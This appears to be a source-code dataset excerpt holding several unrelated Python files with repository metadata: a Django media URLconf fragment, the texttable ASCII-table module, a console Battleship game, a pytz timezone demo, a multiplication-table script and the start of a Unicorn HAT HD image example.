# NOTE(review): static() serving of media like this is a development-only
# convenience — confirm production serves MEDIA_ROOT via the web server.
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# FROM PREVIOUS APP CODE:
# Modified to be more explicit. Helps others who are reading our code. We're only adding this on when
# we're in DEBUG mode.
# if settings.DEBUG:
# urlpatterns += static(settings.MEDIA_URL,
# document_root=settings.MEDIA_ROOT)
# Original snippet from django's docs for media:
# from django.conf import settings
# from django.conf.urls.static import static
# urlpatterns = [
# # ... the rest of your URLconf goes here ...
# ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"gaylon.alfano@gmail.com"
] |
gaylon.alfano@gmail.com
|
921a24a58fdec22a688db14ecfd1318b1a710cf3
|
7ec7ec203b91f389d66a457a2ceda5768653925e
|
/assig10/texttable.py
|
55192e1aa3f3fdf8145f68f4f4b7f82275b2e0ab
|
[] |
no_license
|
BogdanDumbravean/Fundamentals-of-Programming-FP
|
5fb8c2980ca6e133d9850826795f71682becd57e
|
6bada4bdb2e526a758642b7c947f958c58d32d04
|
refs/heads/master
| 2022-04-11T03:38:11.945899
| 2020-03-18T14:07:03
| 2020-03-18T14:07:03
| 245,674,541
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,261
|
py
|
# texttable - module for creating simple ASCII tables
# Copyright (C) 2003-2018 Gerome Fournier <jef(at)foutaise.org>
"""module for creating simple ASCII tables
Example:
table = Texttable()
table.set_cols_align(["l", "r", "c"])
table.set_cols_valign(["t", "m", "b"])
table.add_rows([["Name", "Age", "Nickname"],
["Mr\\nXavier\\nHuon", 32, "Xav'"],
["Mr\\nBaptiste\\nClement", 1, "Baby"],
["Mme\\nLouise\\nBourgeau", 28, "Lou\\n\\nLoue"]])
print table.draw() + "\\n"
table = Texttable()
table.set_deco(Texttable.HEADER)
table.set_cols_dtype(['t', # text
'f', # float (decimal)
'e', # float (exponent)
'i', # integer
'a']) # automatic
table.set_cols_align(["l", "r", "r", "r", "l"])
table.add_rows([["text", "float", "exp", "int", "auto"],
["abcd", "67", 654, 89, 128.001],
["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
print table.draw()
Result:
+----------+-----+----------+
| Name | Age | Nickname |
+==========+=====+==========+
| Mr | | |
| Xavier | 32 | |
| Huon | | Xav' |
+----------+-----+----------+
| Mr | | |
| Baptiste | 1 | |
| Clement | | Baby |
+----------+-----+----------+
| Mme | | Lou |
| Louise | 28 | |
| Bourgeau | | Loue |
+----------+-----+----------+
text float exp int auto
===========================================
abcd 67.000 6.540e+02 89 128.001
efgh 67.543 6.540e-01 90 1.280e+22
ijkl 0.000 5.000e-78 89 0.000
mnop 0.023 5.000e+78 92 1.280e+22
"""
from __future__ import division
__all__ = ["Texttable", "ArraySizeError"]
__author__ = 'Gerome Fournier <jef(at)foutaise.org>'
__license__ = 'MIT'
__version__ = '1.5.0'
__credits__ = """\
Jeff Kowalczyk:
- textwrap improved import
- comment concerning header output
Anonymous:
- add_rows method, for adding rows in one go
Sergey Simonenko:
- redefined len() function to deal with non-ASCII characters
Roger Lew:
- columns datatype specifications
Brian Peterson:
- better handling of unicode errors
Frank Sachsenheim:
- add Python 2/3-compatibility
Maximilian Hils:
- fix minor bug for Python 3 compatibility
frinkelpi:
- preserve empty lines
"""
import sys
import unicodedata
# define a text wrapping function to wrap some text
# to a specific width:
# - use cjkwrap if available (better CJK support)
# - fallback to textwrap otherwise
try:
    import cjkwrap
    def textwrapper(txt, width):
        """Wrap txt to at most width columns using cjkwrap (CJK-aware)."""
        return cjkwrap.wrap(txt, width)
except ImportError:
    try:
        import textwrap
        def textwrapper(txt, width):
            """Wrap txt to at most width columns using stdlib textwrap."""
            return textwrap.wrap(txt, width)
    except ImportError:
        # No wrapping backend at all: report and re-raise the ImportError.
        sys.stderr.write("Can't import textwrap module!\n")
        raise
# define a function to calculate the rendering width of a unicode character
# - use wcwidth if available
# - fallback to unicodedata information otherwise
try:
    import wcwidth
    def uchar_width(c):
        """Return the rendering width of a unicode character
        """
        # wcwidth() returns -1 for non-printable characters; clamp to 0.
        return max(0, wcwidth.wcwidth(c))
except ImportError:
    def uchar_width(c):
        """Return the rendering width of a unicode character
        """
        # Wide ('W') and Fullwidth ('F') East-Asian characters take 2 columns.
        if unicodedata.east_asian_width(c) in 'WF':
            return 2
        elif unicodedata.combining(c):
            # Combining marks render on top of the previous character.
            return 0
        else:
            return 1
from functools import reduce
# Python 2/3 compatibility aliases used by obj2unicode() and len() below.
if sys.version_info >= (3, 0):
    unicode_type = str
    bytes_type = bytes
else:
    #unicode_type = unicode
    bytes_type = str
    # NOTE(review): the Python 2 assignment of unicode_type is commented out,
    # so on Python 2 any use of unicode_type raises NameError — this module
    # appears to only work under Python 3; confirm before supporting Py2.
def obj2unicode(obj):
    """Return a unicode representation of a python object.

    Strings pass through unchanged; byte strings are decoded as UTF-8
    (falling back to replacement characters on decode errors); anything
    else is converted via unicode_type().
    """
    if isinstance(obj, unicode_type):
        return obj
    if isinstance(obj, bytes_type):
        try:
            return unicode_type(obj, 'utf-8')
        except UnicodeDecodeError as strerror:
            sys.stderr.write("UnicodeDecodeError exception for string '%s': %s\n" % (obj, strerror))
            return unicode_type(obj, 'utf-8', 'replace')
    return unicode_type(obj)
def len(iterable):
    """Redefining len here so it will be able to work with non-ASCII characters.

    For (byte) strings, return the display width (sum of per-character
    rendering widths); for everything else, defer to __len__().
    """
    if isinstance(iterable, (bytes_type, unicode_type)):
        return sum(uchar_width(ch) for ch in obj2unicode(iterable))
    return iterable.__len__()
class ArraySizeError(Exception):
    """Exception raised when specified rows don't fit the required size."""

    def __init__(self, msg):
        # Keep the message on the instance; args mirror the historical
        # two-element form (msg, '').
        self.msg = msg
        super().__init__(msg, '')

    def __str__(self):
        return self.msg
class FallbackToText(Exception):
    """Signals that a value could not be converted to float and should be
    formatted as plain text instead."""
class Texttable:
    """ASCII table renderer.

    Collect a header and rows (header()/add_row()/add_rows()), configure
    alignment, decoration, datatypes and widths via the set_* methods
    (all of which return self for chaining), then call draw() to get the
    rendered table as a string.
    """

    # Decoration bit flags, OR-ed together into self._deco (see set_deco()).
    BORDER = 1
    HEADER = 1 << 1
    HLINES = 1 << 2
    VLINES = 1 << 3
    def __init__(self, max_width=80):
        """Constructor
        - max_width is an integer, specifying the maximum width of the table
        - if set to 0, size is unlimited, therefore cells won't be wrapped
        """
        self.set_max_width(max_width)
        self._precision = 3
        # All decorations enabled by default.
        self._deco = Texttable.VLINES | Texttable.HLINES | Texttable.BORDER | \
            Texttable.HEADER
        self.set_chars(['-', '|', '+', '='])
        self.reset()
    def reset(self):
        """Reset the instance
        - reset rows and header
        """
        self._hline_string = None
        self._row_size = None
        self._header = []
        self._rows = []
        return self
    def set_max_width(self, max_width):
        """Set the maximum width of the table
        - max_width is an integer, specifying the maximum width of the table
        - if set to 0, size is unlimited, therefore cells won't be wrapped
        """
        self._max_width = max_width if max_width > 0 else False
        return self
    def set_chars(self, array):
        """Set the characters used to draw lines between rows and columns
        - the array should contain 4 fields:
            [horizontal, vertical, corner, header]
        - default is set to:
            ['-', '|', '+', '=']
        """
        if len(array) != 4:
            raise ArraySizeError("array should contain 4 characters")
        # Coerce each entry to a string and keep only its first character.
        array = [ x[:1] for x in [ str(s) for s in array ] ]
        (self._char_horiz, self._char_vert,
            self._char_corner, self._char_header) = array
        return self
    def set_deco(self, deco):
        """Set the table decoration
        - 'deco' can be a combinaison of:
            Texttable.BORDER: Border around the table
            Texttable.HEADER: Horizontal line below the header
            Texttable.HLINES: Horizontal lines between rows
            Texttable.VLINES: Vertical lines between columns
           All of them are enabled by default
        - example:
            Texttable.BORDER | Texttable.HEADER
        """
        self._deco = deco
        return self
    def set_header_align(self, array):
        """Set the desired header alignment
        - the elements of the array should be either "l", "c" or "r":
            * "l": column flushed left
            * "c": column centered
            * "r": column flushed right
        """
        self._check_row_size(array)
        self._header_align = array
        return self
    def set_cols_align(self, array):
        """Set the desired columns alignment
        - the elements of the array should be either "l", "c" or "r":
            * "l": column flushed left
            * "c": column centered
            * "r": column flushed right
        """
        self._check_row_size(array)
        self._align = array
        return self
    def set_cols_valign(self, array):
        """Set the desired columns vertical alignment
        - the elements of the array should be either "t", "m" or "b":
            * "t": column aligned on the top of the cell
            * "m": column aligned on the middle of the cell
            * "b": column aligned on the bottom of the cell
        """
        self._check_row_size(array)
        self._valign = array
        return self
    def set_cols_dtype(self, array):
        """Set the desired columns datatype for the cols.
        - the elements of the array should be either a callable or any of
          "a", "t", "f", "e" or "i":
            * "a": automatic (try to use the most appropriate datatype)
            * "t": treat as text
            * "f": treat as float in decimal format
            * "e": treat as float in exponential format
            * "i": treat as int
            * a callable: should return formatted string for any value given
        - by default, automatic datatyping is used for each column
        """
        self._check_row_size(array)
        self._dtype = array
        return self
    def set_cols_width(self, array):
        """Set the desired columns width
        - the elements of the array should be integers, specifying the
          width of each column. For example:
                [10, 20, 5]
        """
        self._check_row_size(array)
        try:
            array = list(map(int, array))
            if reduce(min, array) <= 0:
                raise ValueError
        except ValueError:
            sys.stderr.write("Wrong argument in column width specification\n")
            raise
        self._width = array
        return self
    def set_precision(self, width):
        """Set the desired precision for float/exponential formats
        - width must be an integer >= 0
        - default value is set to 3
        """
        if not type(width) is int or width < 0:
            raise ValueError('width must be an integer greater then 0')
        self._precision = width
        return self
    def header(self, array):
        """Specify the header of the table
        """
        self._check_row_size(array)
        self._header = list(map(obj2unicode, array))
        return self
    def add_row(self, array):
        """Add a row in the rows stack
        - cells can contain newlines and tabs
        """
        self._check_row_size(array)
        # Default to automatic datatyping when set_cols_dtype() wasn't called.
        if not hasattr(self, "_dtype"):
            self._dtype = ["a"] * self._row_size
        cells = []
        for i, x in enumerate(array):
            cells.append(self._str(i, x))
        self._rows.append(cells)
        return self
    def add_rows(self, rows, header=True):
        """Add several rows in the rows stack
        - The 'rows' argument can be either an iterator returning arrays,
          or a by-dimensional array
        - 'header' specifies if the first row should be used as the header
          of the table
        """
        # nb: don't use 'iter' on by-dimensional arrays, to get a
        #     usable code for python 2.1
        # NOTE(review): hasattr(rows, 'next') is the Python 2 iterator
        # protocol; Python 3 iterators expose __next__ instead, so on
        # Python 3 this always takes the indexing branch — which fails
        # for generators. Pass a list on Python 3.
        if header:
            if hasattr(rows, '__iter__') and hasattr(rows, 'next'):
                self.header(rows.next())
            else:
                self.header(rows[0])
                rows = rows[1:]
        for row in rows:
            self.add_row(row)
        return self
    def draw(self):
        """Draw the table
        - the table is returned as a whole string
        """
        # NOTE(review): with no header and no rows this returns None
        # (implicit return), not an empty string — callers doing
        # draw() + "\n" on an empty table will raise TypeError.
        if not self._header and not self._rows:
            return
        self._compute_cols_width()
        self._check_align()
        out = ""
        if self._has_border():
            out += self._hline()
        if self._header:
            out += self._draw_line(self._header, isheader=True)
            if self._has_header():
                out += self._hline_header()
        length = 0
        for row in self._rows:
            length += 1
            out += self._draw_line(row)
            if self._has_hlines() and length < len(self._rows):
                out += self._hline()
        if self._has_border():
            out += self._hline()
        return out[:-1]
    @classmethod
    def _to_float(cls, x):
        # Raise FallbackToText for values that cannot be treated as numbers.
        if x is None:
            raise FallbackToText()
        try:
            return float(x)
        except (TypeError, ValueError):
            raise FallbackToText()
    @classmethod
    def _fmt_int(cls, x, **kw):
        """Integer formatting class-method.
        - x will be float-converted and then used.
        """
        return str(int(round(cls._to_float(x))))
    @classmethod
    def _fmt_float(cls, x, **kw):
        """Float formatting class-method.
        - x parameter is ignored. Instead kw-argument f being x float-converted
          will be used.
        - precision will be taken from `n` kw-argument.
        """
        n = kw.get('n')
        return '%.*f' % (n, cls._to_float(x))
    @classmethod
    def _fmt_exp(cls, x, **kw):
        """Exponential formatting class-method.
        - x parameter is ignored. Instead kw-argument f being x float-converted
          will be used.
        - precision will be taken from `n` kw-argument.
        """
        n = kw.get('n')
        return '%.*e' % (n, cls._to_float(x))
    @classmethod
    def _fmt_text(cls, x, **kw):
        """String formatting class-method."""
        return obj2unicode(x)
    @classmethod
    def _fmt_auto(cls, x, **kw):
        """auto formatting class-method."""
        f = cls._to_float(x)
        # Large magnitudes go to exponent form; integral values to int;
        # everything else to fixed-point float.
        if abs(f) > 1e8:
            fn = cls._fmt_exp
        else:
            if f - round(f) == 0:
                fn = cls._fmt_int
            else:
                fn = cls._fmt_float
        return fn(x, **kw)
    def _str(self, i, x):
        """Handles string formatting of cell data
            i - index of the cell datatype in self._dtype
            x - cell data to format
        """
        FMT = {
            'a':self._fmt_auto,
            'i':self._fmt_int,
            'f':self._fmt_float,
            'e':self._fmt_exp,
            't':self._fmt_text,
            }
        n = self._precision
        dtype = self._dtype[i]
        try:
            if callable(dtype):
                return dtype(x)
            else:
                return FMT[dtype](x, n=n)
        except FallbackToText:
            # Non-numeric value in a numeric column: render it as text.
            return self._fmt_text(x)
    def _check_row_size(self, array):
        """Check that the specified array fits the previous rows size
        """
        if not self._row_size:
            self._row_size = len(array)
        elif self._row_size != len(array):
            raise ArraySizeError("array should contain %d elements" \
                % self._row_size)
    def _has_vlines(self):
        """Return a boolean, if vlines are required or not
        """
        return self._deco & Texttable.VLINES > 0
    def _has_hlines(self):
        """Return a boolean, if hlines are required or not
        """
        return self._deco & Texttable.HLINES > 0
    def _has_border(self):
        """Return a boolean, if border is required or not
        """
        return self._deco & Texttable.BORDER > 0
    def _has_header(self):
        """Return a boolean, if header line is required or not
        """
        return self._deco & Texttable.HEADER > 0
    def _hline_header(self):
        """Print header's horizontal line
        """
        return self._build_hline(True)
    def _hline(self):
        """Print an horizontal line
        """
        # Plain hlines are identical, so build once and cache.
        if not self._hline_string:
            self._hline_string = self._build_hline()
        return self._hline_string
    def _build_hline(self, is_header=False):
        """Return a string used to separated rows or separate header from
        rows
        """
        horiz = self._char_horiz
        if (is_header):
            horiz = self._char_header
        # compute cell separator
        s = "%s%s%s" % (horiz, [horiz, self._char_corner][self._has_vlines()],
            horiz)
        # build the line
        l = s.join([horiz * n for n in self._width])
        # add border if needed
        if self._has_border():
            l = "%s%s%s%s%s\n" % (self._char_corner, horiz, l, horiz,
                self._char_corner)
        else:
            l += "\n"
        return l
    def _len_cell(self, cell):
        """Return the width of the cell
        Special characters are taken into account to return the width of the
        cell, such like newlines and tabs
        """
        cell_lines = cell.split('\n')
        maxi = 0
        for line in cell_lines:
            length = 0
            parts = line.split('\t')
            for part, i in zip(parts, list(range(1, len(parts) + 1))):
                length = length + len(part)
                if i < len(parts):
                    # Tabs advance to the next multiple-of-8 column.
                    length = (length//8 + 1) * 8
            maxi = max(maxi, length)
        return maxi
    def _compute_cols_width(self):
        """Return an array with the width of each column
        If a specific width has been specified, exit. If the total of the
        columns width exceed the table desired width, another width will be
        computed to fit, and cells will be wrapped.
        """
        if hasattr(self, "_width"):
            return
        maxi = []
        if self._header:
            maxi = [ self._len_cell(x) for x in self._header ]
        for row in self._rows:
            for cell,i in zip(row, list(range(len(row)))):
                try:
                    maxi[i] = max(maxi[i], self._len_cell(cell))
                except (TypeError, IndexError):
                    maxi.append(self._len_cell(cell))
        ncols = len(maxi)
        content_width = sum(maxi)
        # Width consumed by separators and (optionally) the outer border.
        deco_width = 3*(ncols-1) + [0,4][self._has_border()]
        if self._max_width and (content_width + deco_width) > self._max_width:
            """ content too wide to fit the expected max_width
            let's recompute maximum cell width for each cell
            """
            if self._max_width < (ncols + deco_width):
                raise ValueError('max_width too low to render data')
            available_width = self._max_width - deco_width
            newmaxi = [0] * ncols
            i = 0
            # Distribute the available width one column at a time, round-robin,
            # never exceeding a column's natural width.
            while available_width > 0:
                if newmaxi[i] < maxi[i]:
                    newmaxi[i] += 1
                    available_width -= 1
                i = (i + 1) % ncols
            maxi = newmaxi
        self._width = maxi
    def _check_align(self):
        """Check if alignment has been specified, set default one if not
        """
        if not hasattr(self, "_header_align"):
            self._header_align = ["c"] * self._row_size
        if not hasattr(self, "_align"):
            self._align = ["l"] * self._row_size
        if not hasattr(self, "_valign"):
            self._valign = ["t"] * self._row_size
    def _draw_line(self, line, isheader=False):
        """Draw a line
        Loop over a single cell length, over all the cells
        """
        line = self._splitit(line, isheader)
        space = " "
        out = ""
        for i in range(len(line[0])):
            if self._has_border():
                out += "%s " % self._char_vert
            length = 0
            for cell, width, align in zip(line, self._width, self._align):
                length += 1
                cell_line = cell[i]
                fill = width - len(cell_line)
                if isheader:
                    align = self._header_align[length - 1]
                if align == "r":
                    out += fill * space + cell_line
                elif align == "c":
                    out += (int(fill/2) * space + cell_line \
                        + int(fill/2 + fill%2) * space)
                else:
                    out += cell_line + fill * space
                if length < len(line):
                    out += " %s " % [space, self._char_vert][self._has_vlines()]
            out += "%s\n" % ['', space + self._char_vert][self._has_border()]
        return out
    def _splitit(self, line, isheader):
        """Split each element of line to fit the column width
        Each element is turned into a list, result of the wrapping of the
        string to the desired width
        """
        line_wrapped = []
        for cell, width in zip(line, self._width):
            array = []
            for c in cell.split('\n'):
                if c.strip() == "":
                    array.append("")
                else:
                    array.extend(textwrapper(c, width))
            line_wrapped.append(array)
        max_cell_lines = reduce(max, list(map(len, line_wrapped)))
        # Pad shorter cells to the tallest cell in the row, according to the
        # column's vertical alignment (headers are always top-aligned).
        for cell, valign in zip(line_wrapped, self._valign):
            if isheader:
                valign = "t"
            if valign == "m":
                missing = max_cell_lines - len(cell)
                cell[:0] = [""] * int(missing / 2)
                cell.extend([""] * int(missing / 2 + missing % 2))
            elif valign == "b":
                cell[:0] = [""] * (max_cell_lines - len(cell))
            else:
                cell.extend([""] * (max_cell_lines - len(cell)))
        return line_wrapped
if __name__ == '__main__':
    # Demo 1: multi-line cells with mixed horizontal/vertical alignment.
    table = Texttable()
    table.set_cols_align(["l", "r", "c"])
    table.set_cols_valign(["t", "m", "b"])
    table.add_rows([["Name", "Age", "Nickname"],
                    ["Mr\nXavier\nHuon", 32, "Xav'"],
                    ["Mr\nBaptiste\nClement", 1, "Baby"],
                    ["Mme\nLouise\nBourgeau", 28, "Lou\n \nLoue"]])
    print(table.draw() + "\n")
    # Demo 2: per-column datatypes with only a header rule as decoration.
    table = Texttable()
    table.set_deco(Texttable.HEADER)
    table.set_cols_dtype(['t', # text
                          'f', # float (decimal)
                          'e', # float (exponent)
                          'i', # integer
                          'a']) # automatic
    table.set_cols_align(["l", "r", "r", "r", "l"])
    table.add_rows([["text", "float", "exp", "int", "auto"],
                    ["abcd", "67", 654, 89, 128.001],
                    ["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
                    ["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
                    ["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
    print(table.draw())
|
[
"noreply@github.com"
] |
BogdanDumbravean.noreply@github.com
|
c315a859c67d982c211b1cc6a911fac71aa21def
|
7bf5d17cd67df4f29e7aca2601d1c4a3d20826dc
|
/BattleShip_War.py
|
1e28f3408ba7b7ff0eb051a44ad50fa472318e13
|
[] |
no_license
|
Fasto84/Battleship_war
|
d7d9661b13be8722b9218fa8e735b2a94ec4bafb
|
f252642f9175741b49af7e182a862a4a1f40d8f6
|
refs/heads/master
| 2023-05-07T12:51:38.260236
| 2021-05-31T18:31:37
| 2021-05-31T18:31:37
| 372,573,411
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,006
|
py
|
from random import randint
class Dot:
    """A single cell coordinate on the game board."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __eq__(self, other):
        # Two dots are equal when both coordinates match.
        return (self.x, self.y) == (other.x, other.y)

    def __repr__(self):
        return "({}, {})".format(self.x, self.y)
class Error(Exception):
    """Base class for all game-specific errors."""
    pass


class BoardOutException(Error):
    """Raised when a shot lands outside the board."""

    def __str__(self):
        return "Выстрел за предел поля!"


class UsedCellException(Error):
    """Raised when the targeted cell was already shot at."""

    def __str__(self):
        return "В эту клетку уже стреляли"


class CannotPlaceShip(Error):
    """Raised when no valid position can be found for a ship."""

    def __str__(self):
        return "Нет подходящего места для корабля!"


class BoardWrongShipException(Error):
    """Internal: a ship placement overlaps or sticks out of the board."""
    pass
class Ship:
    """A ship: bow cell, length l, orientation o (0: along x, 1: along y)."""

    def __init__(self, bow, l, o):
        self.bow = bow
        self.l = l
        self.o = o
        # Remaining hit points equal the ship's length.
        self.lives = l

    @property
    def dots(self):
        """List of Dot cells occupied by the ship."""
        points = []
        for step in range(self.l):
            px, py = self.bow.x, self.bow.y
            if self.o == 0:
                px += step
            elif self.o == 1:
                py += step
            points.append(Dot(px, py))
        return points

    def shooten(self, shot):
        """True when the shot lands on one of the ship's cells."""
        return shot in self.dots
class Board:  # game board
    """Playing field: the grid, the fleet, and shot/occupancy bookkeeping."""
    def __init__(self, hid = False, size = 10):
        self.size = size
        # hid: when True, ship cells are masked in __str__ (enemy view).
        self.hid = hid
        # count: number of ships fully destroyed on this board.
        self.count = 0
        self.field = [["0"] * size for _ in range(size)]
        # busy: cells occupied by ships/contours during setup, then cells
        # already shot at during play (cleared by begin()).
        self.busy = []
        self.ships = []
    def add_ship(self, ship):
        """Place a ship; raise BoardWrongShipException on overlap/out of bounds."""
        for d in ship.dots:
            if self.out(d) or d in self.busy:
                raise BoardWrongShipException()
        for d in ship.dots:
            self.field[d.x][d.y] = "■"
            self.busy.append(d)
        self.ships.append(ship)
        self.contour(ship)
    def contour(self, ship, verb=False):  # outline the ship and mark it on the board
        """Reserve every cell adjacent to the ship (verb=True also draws '.')."""
        near = [
            (-1, -1), (-1, 0), (-1, 1),
            (0, -1), (0, 0), (0, 1),
            (1, -1), (1, 0), (1, 1)
        ]
        for d in ship.dots:
            for dx, dy in near:
                cur = Dot(d.x + dx, d.y + dy)
                if not (self.out(cur)) and cur not in self.busy:
                    if verb:
                        self.field[cur.x][cur.y] = "."
                    self.busy.append(cur)
    def __str__(self):
        # Render a column-numbered header then one numbered row per line;
        # hide ship glyphs when this is the opponent's (hidden) board.
        res = ""
        res += "  | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |"
        for i, row in enumerate(self.field):
            res += f"\n{i + 1} | " + " | ".join(row) + " |"
        if self.hid:
            res = res.replace("■", "O")
        return res
    def out(self, d):
        """True when the dot lies outside the board."""
        return not((0<= d.x < self.size) and (0<= d.y < self.size))
    def shot(self, d):
        """Process a shot at d; return True when the shooter moves again."""
        if self.out(d):
            raise BoardOutException()
        if d in self.busy:
            raise UsedCellException()
        self.busy.append(d)
        for ship in self.ships:
            if d in ship.dots:
                ship.lives -= 1
                self.field[d.x][d.y] = "X"
                if ship.lives == 0:
                    self.count += 1
                    # Mark the dead ship's contour so adjacent cells
                    # cannot be targeted again.
                    self.contour(ship, verb = True)
                    print("Корабль взорван!")
                    return False
                else:
                    print("Пробитие!")
                    return True
        self.field[d.x][d.y] = "."
        print("Мимо!")
        return False
    def begin(self):
        """Reset busy cells before play starts (setup contours no longer apply)."""
        self.busy = []
class Player:
    """Abstract player: owns its board and a reference to the enemy board."""
    def __init__(self, board, enemy):
        self.board = board
        self.enemy = enemy
    def ask(self):
        """Return the Dot to shoot at; implemented by subclasses."""
        raise NotImplementedError()
    def move(self):
        """Ask for targets until a legal shot is made.

        Returns the enemy board's verdict: True when the shot hit and the
        same player moves again. Illegal shots (out of board / repeated
        cell) are reported and re-asked.
        """
        while True:
            try:
                target = self.ask()
                repeat = self.enemy.shot(target)
                return repeat
            except Error as e:
                print(e)
class AI(Player):
    """Computer player: fires at a uniformly random cell of the enemy board."""
    def ask(self):
        """Pick and announce a random target on the enemy board.

        Bug fix: the original sampled randint(0, 5), confining every
        computer shot to the top-left 6x6 corner of the 10x10 board, so
        ships placed elsewhere could never be hit and the AI could never
        win. Sample the full board instead (randint is inclusive, hence
        size - 1).
        """
        limit = self.enemy.size - 1
        d = Dot(randint(0, limit), randint(0, limit))
        print(f"Ход компьютера: {d.x+1} {d.y+1}")
        return d
class User(Player):
    """Human player: reads and validates board coordinates from stdin."""
    def ask(self):
        """Prompt until two valid numbers are entered; return a 0-based Dot."""
        while True:
            parts = input("Ваш ход: ").split()
            if len(parts) != 2:
                print(" Введите 2 координаты! ")
                continue
            if not all(p.isdigit() for p in parts):
                print(" Введите числа! ")
                continue
            x, y = (int(p) for p in parts)
            # Players enter 1-based coordinates; the board is 0-based.
            return Dot(x - 1, y - 1)
class Game:
    """Top-level controller: builds both boards and runs the turn loop.

    Bug fixes relative to the original:
    - random_place() sampled randint(0, size), one past the last valid
      board index (randint is inclusive), guaranteeing wasted attempts.
    - The win check compared the destroyed-ship count against a
      hard-coded 7, but the fleet contains 10 ships, so games ended
      three sunk ships too early. It now compares against the actual
      fleet size.
    """
    def __init__(self, size=10):
        self.size = size
        pl = self.random_board()
        co = self.random_board()
        co.hid = True
        self.ai = AI(co, pl)
        self.us = User(pl, co)
    def random_board(self):
        """Regenerate boards until a full fleet placement succeeds."""
        board = None
        while board is None:
            board = self.random_place()
        return board
    def random_place(self):
        """Try to place the whole fleet at random; None after too many attempts."""
        lens = [4, 3, 3, 2, 2, 2, 1, 1, 1, 1]
        board = Board(size = self.size)
        attempts = 0
        for l in lens:
            while True:
                attempts += 1
                if attempts > 2000:
                    return None
                # Upper bound is size - 1: randint() includes both endpoints.
                ship = Ship(Dot(randint(0, self.size - 1), randint(0, self.size - 1)), l, randint(0, 1))
                try:
                    board.add_ship(ship)
                    break
                except BoardWrongShipException:
                    pass
        board.begin()
        return board
    def greet(self):
        """Print the welcome banner and input-format help."""
        print("-------------------")
        print("  Приветсвуем вас  ")
        print("      в игре       ")
        print("    морской бой    ")
        print("-------------------")
        print(" формат ввода: x y ")
        print(" x - номер строки  ")
        print(" y - номер столбца ")
    def loop(self):
        """Main turn loop: the human moves on even turns, the AI on odd."""
        num = 0
        # A board is beaten when every ship in its fleet is destroyed.
        fleet_size = len(self.ai.board.ships)
        while True:
            print("-" * 20)
            print("Доска игрока:")
            print(self.us.board)
            print("-" * 20)
            print("Доска компьютера:")
            print(self.ai.board)
            if num % 2 == 0:
                print("-" * 20)
                print("Ходит игрок!")
                repeat = self.us.move()
            else:
                print("-" * 20)
                print("Ходит компьютер!")
                repeat = self.ai.move()
            if repeat:
                # A hit grants another turn: cancel the upcoming increment.
                num -= 1
            if self.ai.board.count == fleet_size:
                print("-" * 20)
                print("Игрок выиграл!")
                break
            if self.us.board.count == fleet_size:
                print("-" * 20)
                print("Компьютер выиграл!")
                break
            num += 1
    def start(self):
        """Entry point: greet, then run the game loop."""
        self.greet()
        self.loop()
# Entry point: build a game with default settings and run it.
g = Game()
g.start()
|
[
"email@example.ru"
] |
email@example.ru
|
d4b166d403d26f0ae688d9697bd1ff6f749166e3
|
5a3acab867bc5c67ffe1792b2159d72a041cfe1c
|
/datetime/src/datetime-pytz.py
|
b7b4be1e6097b036102662d83fd8d82aa06fdd55
|
[
"MIT"
] |
permissive
|
WoodenBackpack/book-python
|
4adb5078c4f4557e690feebd827d3d409c67b266
|
c4ed9ff322277be1432ee5e624c249b8e69fd594
|
refs/heads/master
| 2020-03-22T13:11:24.356768
| 2018-07-07T13:47:30
| 2018-07-07T13:47:30
| 140,089,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
# Demo: constructing pytz timezone objects and reading their zone names.
import pytz
utc = pytz.utc
print(utc.zone)
#'UTC'
eastern = pytz.timezone('US/Eastern')
print(eastern.zone)
# 'US/Eastern'
# Bug fix: this variable was misleadingly named `amsterdam` although it
# holds the Europe/Warsaw zone; renamed to match its contents.
warsaw = pytz.timezone('Europe/Warsaw')
print(warsaw.zone)
# 'Europe/Warsaw'
|
[
"matt@astrotech.io"
] |
matt@astrotech.io
|
891bf1124c3f58f352cb380c666eac1259fc66f8
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2601/60749/243951.py
|
bf17d6881be56a15b5a1bfed49e86a7a0e227c88
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 197
|
py
|
# Read the multiplication-table dimensions and k, then print the k-th
# smallest *distinct* product of the row x col table.
row_count = int(input())
col_count = int(input())
k = int(input())
# A set comprehension deduplicates products, exactly like the original
# list-then-set round trip; sorted() yields them in ascending order.
distinct_products = sorted({a * b
                            for a in range(1, row_count + 1)
                            for b in range(1, col_count + 1)})
print(distinct_products[k - 1])
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
beea2bf331c9369881069c2908c758b4ffc41cdb
|
22be44dce81f6c0ac9f891e1661118299e4feaf1
|
/labs/src/A.1.HelloSetup/complete/show-png.py
|
3447dbebff1d4e074de7624a99b82885f3f90c76
|
[] |
no_license
|
KathiW/python_foundations
|
18a1b24a140e8f3e482a1581986c9bafd64565ff
|
02b6d5b2532fb9c71a497ab1fe506a7d70bc13e1
|
refs/heads/main
| 2023-02-19T10:47:02.391016
| 2021-01-20T13:00:51
| 2021-01-20T13:00:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,431
|
py
|
import os
import time
from sys import exit
try:
    from PIL import Image
except ImportError:
    exit('This script requires the pillow module\nInstall with: sudo pip install pillow')
import unicornhathd
print("""Unicorn HAT HD: Show a PNG image!
This basic example shows use of the Python Pillow library.
The tiny 16x16 bosses in lofi.png are from Oddball:
http://forums.tigsource.com/index.php?topic=8834.0
